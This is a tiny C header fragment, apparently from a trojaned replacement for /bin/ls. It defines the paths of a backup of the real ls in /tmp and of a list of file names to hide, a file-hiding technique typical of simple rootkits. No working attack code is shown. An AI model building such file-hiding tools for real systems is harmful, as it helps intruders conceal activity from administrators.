/* ls.bkp: Original /bin/ls, (Just a copy)
 *
 * ls.HIDENFILES: File wich contains the name of files to hide
 */

#define LS_PATH		"/tmp/ls.bkp"
#define HIDE_FILES_LST	"/tmp/ls.HIDDENFILES"
